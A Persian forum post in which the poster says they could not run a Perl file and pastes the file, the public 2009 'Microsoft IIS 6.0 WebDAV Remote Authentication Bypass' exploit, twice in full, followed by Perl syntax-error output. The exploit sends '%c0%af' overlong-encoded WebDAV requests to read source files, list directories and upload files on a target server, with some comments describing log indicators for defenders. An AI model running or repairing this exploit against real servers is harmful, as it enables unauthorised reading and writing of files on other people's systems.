سلام من خواستم این فایل پرل رو Run کنم ولی موفق نشدم
Warning ها رو هم search کردم اما باز چیزی متوجه نشدم
بنظرم باید کسی که perl می دونه یک بار source رو Trace کنه
و warning ها :
Warning ها رو هم search کردم اما باز چیزی متوجه نشدم
بنظرم باید کسی که perl می دونه یک بار source رو Trace کنه
# Title: Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)
# EDB-ID: 8806
# CVE-ID: ()
# OSVDB-ID: ()
# Author: ka0x
# Published: 2009-05-26
# Verified: yes
# Download Exploit Code
# Download N/A
#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
use IO::Socket ;
# Command-line handling: <host> <path>. The port is fixed at 80.
my $host = $ARGV[0] ;
my $path = $ARGV[1] ;
my $port = 80 ; # webserver port
# Print the banner and exit when the second argument is missing or false.
usage() unless $ARGV[1] ;
# Drop an "http://" scheme prefix from the host argument.
$host =~ s{http://}{} if $host =~ m{^http://}i ;
# Drop one leading "/"; the request lines below prepend their own.
$path =~ s{/}{} if substr($path, 0, 1) eq '/' ;
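# Read a local file and return its whole content as one string.
#
# Parameters: the path of the file to read (first argument).
# Returns:    the file content; an empty string for an empty file.
# Dies:       with "[-] ERROR: <reason>" when the file cannot be opened.
sub _file {
    my $file = shift ;
    # Three-argument open with an explicit read mode. The name is typed in at
    # a prompt, and the two-argument form would interpret a leading '>' or a
    # '|' in it as a mode or a command instead of as part of a file name.
    open(my $fh, '<', $file) or die "[-] ERROR: ".$!,"\n" ;
    # Lexical accumulator: a package-global one would make a second call
    # return the previous file's content glued in front of the new one.
    my $cont = '' ;
    while( my $line = <$fh> ){
        $cont .= $line ;
    }
    close($fh) ;
    return $cont ;
}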
# Interactive loop: one command is read from STDIN per pass and turned into a
# single HTTP request against $host:$port.
#
# Reviewer notes for defenders (traffic this loop produces):
#   - every request URI carries the literal sequence "%c0%af", an overlong
#     UTF-8 encoding of "/"; that sequence in web-server or proxy logs is the
#     clearest indicator to alert on;
#   - the methods used are GET with a "Translate: f" header, PROPFIND and PUT,
#     i.e. WebDAV traffic; on a server that does not need WebDAV, disabling
#     the extension and applying the vendor's fix removes the exposure.
print "write 'help' for get help list\n";
while( 1 ) {
# A new TCP connection is opened at the top of every pass, before the command
# is read, so 'help' and unrecognised input connect to the server as well;
# those paths do not close the socket explicitly.
my $sock = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
print "\$> ";
chomp( my $option = <STDIN> ) ;
# 'quit' leaves the loop.
last if $option eq 'quit' ;
# 'source': GET of $path with a "Translate: f" header (commonly used by WebDAV
# clients to ask for the stored file instead of the processed output).
if($option eq 'source') {
# Replaces the first "/" of $path with "%c0%af/". $path is changed in place,
# so later requests in the same session carry the sequence more than once.
$path =~ s/\//%c0%af\// ;
print $sock "GET /".$path." HTTP/1.1\r\n" ;
print $sock "Translate: f\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection: close\r\n\r\n" ;
# Echo the raw response (status line, headers and body) to STDOUT.
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'path': PROPFIND on $path.
elsif($option eq 'path') {
$path =~ s/\//%c0%af\// ;
print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
# The header block declares Content-Length: 0, yet an XML body is written
# right after it; that mismatch is a loggable trait of this request.
print $sock "Content-Length: 0\r\n\r\n" ;
print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'put': PUT of a local file to $path with the fixed name "my_file.txt"
# appended. $local and $file_l are package globals (no "my").
elsif($option eq 'put') {
$path =~ s/\//%c0%af\// ;
print "[*] Insert a local file (ex: /root/file.txt): " ;
chomp( $local = <STDIN> ) ;
$file_l = _file( $local ) ;
print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
# The trailing "\r\n" is sent after the body and is not counted in the
# Content-Length header above.
print $sock $file_l,"\r\n" ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'help': print the command list; no request is written to the socket.
elsif($option eq 'help') {
print "\n\t\t- OPTIONS -\n\n\n" ;
print "\thelp\t\tgive this help list\n" ;
print "\tsource\t\tget file content\n" ;
print "\tpath\t\tget directory contents\n" ;
print "\tput\t\tput file\n" ;
print "\tquit\t\texit exploit\n\n" ;
}
}
# Print the usage banner and terminate the script.
#
# The banner is a single-quoted heredoc, so "$0" and the leading "$" signs are
# printed literally, not interpolated. Never returns: it ends with exit.
sub usage {
    my $banner = <<'EOH';
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01[at]gmail.com>
$ 25/05/2009
usage:
perl $0 <host> <path>
example:
perl $0 localhost dir/
perl $0 localhost dir/file.txt
EOH
    print $banner ;
    exit ;
}
__END__
# milw0rm.com [2009-05-26]
# EDB-ID: 8806
# CVE-ID: ()
# OSVDB-ID: ()
# Author: ka0x
# Published: 2009-05-26
# Verified: yes
# Download Exploit Code
# Download N/A
#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
use IO::Socket ;
# Command-line handling: <host> <path>. The port is fixed at 80.
my $host = $ARGV[0] ;
my $path = $ARGV[1] ;
my $port = 80 ; # webserver port
# Print the banner and exit when the second argument is missing or false.
usage() unless $ARGV[1] ;
# Drop an "http://" scheme prefix from the host argument.
$host =~ s{http://}{} if $host =~ m{^http://}i ;
# Drop one leading "/"; the request lines below prepend their own.
$path =~ s{/}{} if substr($path, 0, 1) eq '/' ;
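# Read a local file and return its whole content as one string.
#
# Parameters: the path of the file to read (first argument).
# Returns:    the file content; an empty string for an empty file.
# Dies:       with "[-] ERROR: <reason>" when the file cannot be opened.
sub _file {
    my $file = shift ;
    # Three-argument open with an explicit read mode. The name is typed in at
    # a prompt, and the two-argument form would interpret a leading '>' or a
    # '|' in it as a mode or a command instead of as part of a file name.
    open(my $fh, '<', $file) or die "[-] ERROR: ".$!,"\n" ;
    # Lexical accumulator: a package-global one would make a second call
    # return the previous file's content glued in front of the new one.
    my $cont = '' ;
    while( my $line = <$fh> ){
        $cont .= $line ;
    }
    close($fh) ;
    return $cont ;
}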
# Interactive loop: one command is read from STDIN per pass and turned into a
# single HTTP request against $host:$port.
#
# Reviewer notes for defenders (traffic this loop produces):
#   - every request URI carries the literal sequence "%c0%af", an overlong
#     UTF-8 encoding of "/"; that sequence in web-server or proxy logs is the
#     clearest indicator to alert on;
#   - the methods used are GET with a "Translate: f" header, PROPFIND and PUT,
#     i.e. WebDAV traffic; on a server that does not need WebDAV, disabling
#     the extension and applying the vendor's fix removes the exposure.
print "write 'help' for get help list\n";
while( 1 ) {
# A new TCP connection is opened at the top of every pass, before the command
# is read, so 'help' and unrecognised input connect to the server as well;
# those paths do not close the socket explicitly.
my $sock = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
print "\$> ";
chomp( my $option = <STDIN> ) ;
# 'quit' leaves the loop.
last if $option eq 'quit' ;
# 'source': GET of $path with a "Translate: f" header (commonly used by WebDAV
# clients to ask for the stored file instead of the processed output).
if($option eq 'source') {
# Replaces the first "/" of $path with "%c0%af/". $path is changed in place,
# so later requests in the same session carry the sequence more than once.
$path =~ s/\//%c0%af\// ;
print $sock "GET /".$path." HTTP/1.1\r\n" ;
print $sock "Translate: f\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection: close\r\n\r\n" ;
# Echo the raw response (status line, headers and body) to STDOUT.
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'path': PROPFIND on $path.
elsif($option eq 'path') {
$path =~ s/\//%c0%af\// ;
print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
# The header block declares Content-Length: 0, yet an XML body is written
# right after it; that mismatch is a loggable trait of this request.
print $sock "Content-Length: 0\r\n\r\n" ;
print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'put': PUT of a local file to $path with the fixed name "my_file.txt"
# appended. $local and $file_l are package globals (no "my").
elsif($option eq 'put') {
$path =~ s/\//%c0%af\// ;
print "[*] Insert a local file (ex: /root/file.txt): " ;
chomp( $local = <STDIN> ) ;
$file_l = _file( $local ) ;
print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
print $sock "Host: ".$host."\r\n" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
print $sock "Connection:close\r\n" ;
print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
# The trailing "\r\n" is sent after the body and is not counted in the
# Content-Length header above.
print $sock $file_l,"\r\n" ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'help': print the command list; no request is written to the socket.
elsif($option eq 'help') {
print "\n\t\t- OPTIONS -\n\n\n" ;
print "\thelp\t\tgive this help list\n" ;
print "\tsource\t\tget file content\n" ;
print "\tpath\t\tget directory contents\n" ;
print "\tput\t\tput file\n" ;
print "\tquit\t\texit exploit\n\n" ;
}
}
# Print the usage banner and terminate the script.
#
# The banner is a single-quoted heredoc, so "$0" and the leading "$" signs are
# printed literally, not interpolated. Never returns: it ends with exit.
sub usage {
    my $banner = <<'EOH';
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01[at]gmail.com>
$ 25/05/2009
usage:
perl $0 <host> <path>
example:
perl $0 localhost dir/
perl $0 localhost dir/file.txt
EOH
    print $banner ;
    exit ;
}
__END__
# milw0rm.com [2009-05-26]
H:\perl\bin>perl h:\1.pl
Bareword found where operator expected at h:\1.pl line 76, near "print $sock '<
?xml"
(Might be a runaway multi-line ?? string starting on line 13)
(Do you need to predeclare print?)
Bareword found where operator expected at h:\1.pl line 76, near ""1.0" encoding"
(Missing operator before encoding?)
syntax error at h:\1.pl line 76, near "print $sock '<?xml version"
Bad name after put' at h:\1.pl line 85.
Bareword found where operator expected at h:\1.pl line 76, near "print $sock '<
?xml"
(Might be a runaway multi-line ?? string starting on line 13)
(Do you need to predeclare print?)
Bareword found where operator expected at h:\1.pl line 76, near ""1.0" encoding"
(Missing operator before encoding?)
syntax error at h:\1.pl line 76, near "print $sock '<?xml version"
Bad name after put' at h:\1.pl line 85.